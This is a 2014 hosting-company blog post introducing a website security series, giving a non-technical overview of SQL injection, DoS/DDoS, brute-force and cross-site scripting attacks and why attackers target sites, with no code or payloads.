Published 31 March 2014
Welcome to the first in our series of posts on website security. In this series we're going to take a look at common types of attacks on websites, what to do if your site is the victim of an attack, specifically hardening of your site's code or CMS.
Today we're looking at the most common types of attacks and why hackers might want to exploit your website.
Injection Attacks, more specifically SQLI (Structured Query Language Injection) is a technique to modify a database query string by injecting code into the query. The SQLI exploits a possible vulnerability where queries can be executed with unvalidated data. SQLI's are still one of the most commonly used website exploits and can be used to potentially gain access to your database tables including user and password information. These types of attacks are particularly common on enterprise and e-commerce sites where hackers expect large databases to be present. SQLI attacks are also among the easiest attacks to execute, requiring no more than a single PC and a small amount of database knowledge.
Denial of Service (DoS) or Distributed Denial of Service (DDoS) attacks are the most common ways to overwhelm a website. These are attempts to flood a site with external requests, making that site (and potentially others on the same server) unavailable for users. DoS attacks usually target specific ports, IP ranges, or entire networks, but can be targeted to any connected device or service.
Denial of Service attacks are when one computer with an internet connection attempts to flood a server with packets. DDoS on the other hand are when many devices, often widely distributed into a botnet attempt to flood the target with hundreds, often thousands of requests.
Take a look at the current attack bandwidth here.
DDoS attacks come in 3 main varieties:
These are essentially attempts to "crack" every possible combination of username + password on a website. Brute Force attacks are looking for weak passwords to exploit and grant hackers access to your site. Given enough time a brute force attack will ultimately be successful (if no other security practices are in effect) so the trick is to make your passwords so secure that it would take too long to crack. As computers become more and more powerful the need for stronger passwords becomes increasingly important.
Attackers use Cross-site Scripting (XSS) to inject malicious scripts into what would otherwise be harmless websites. Because these scripts appear to come from trusted websites, the end-users browser often executes the script, granting hackers access to information held in cookies or session tokens used with that site. XSS is usually used to gain access of a users account.
While these are the most common types of attacks, they represent less than half of all known website exploitation's. The size and volume of attacks has grown steadily and there is a constant arms race with server and hosting providers employing ever-evolving network level protection and hackers employing ever stronger attacks.
Hackers are usually attempting to overcome a website's defenses often because of a grudge or complaint against that company or site. Hackers also work to bring sites down for commercial or political reasons (e.g. competitors, hacktivists). They can also be criminally minded, and attempt to extort site owners by obtaining potentially valuable user information or threatening to deface the site. Sites hosted on Shared Hosting often have access to large bandwidths, thus making them targets to amplify DDoS attacks.
The reality is that many types of attacks to websites require hardening of the website code itself. In coming posts we'll go into more detail about how you can harden your site defenses over and above what we already provide at a network level.